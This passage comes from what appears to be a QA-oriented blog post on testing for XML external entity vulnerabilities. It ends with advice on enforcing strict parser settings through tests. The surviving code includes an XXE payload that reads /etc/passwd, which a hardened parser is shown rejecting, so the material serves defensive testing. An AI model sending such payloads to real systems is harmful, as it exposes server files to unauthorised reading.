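    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<root>&xxe;</root>"
)
try:
    parse_xml_strict(hostile)
except DoctypeForbidden as error:
    print("rejected:", error)
```

Putting the policy in one function is what makes it testable: application code calls `parse_xml_strict`, and a static check can then flag any other parser construction as a deviation.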
Prevention only works when your test suite actively verifies that external entity resolution is disabled under adversarial payloads. A parser configured correctly in code can have its configuration overridden by a library update, a framework default, or a developer who does not understand why the configuration exists. The XXE payload tests are the enforcement mechanism.
Conclusion
Working on a cybersecurity platform protecting U.S. critical infrastructure and multiple branches of the U.S. military gives you a direct view of what document parsing vulnerabilities mean at scale. In those environments, a file upload endpoint that processes XML is not a minor feature. It is a potential entry point into internal network infrastructure.
XXE sits in the category of vulnerabilities that are entirely invisible to functional test coverage and entirely obvious once you know what payload to submit.
The gap between "this endpoint parses XML correctly" and "this endpoint refuses to resolve external entities" is a single parser configuration line. The test suite is the only thing that tells you whether that line is there.
When did your team last verify that every XML parser in your codebase has external entity resolution explicitly disabled — and do you have a test that would catch a new parser instantiation that ships without that configuration?
Part of the Break It on Purpose series, published weekly for QA engineers and SDETs who find bugs before attackers do.
Practice sandbox: yuriysafron.com/qa-sandbox
LinkedIn: linkedin.com/in/yuriysafronnynov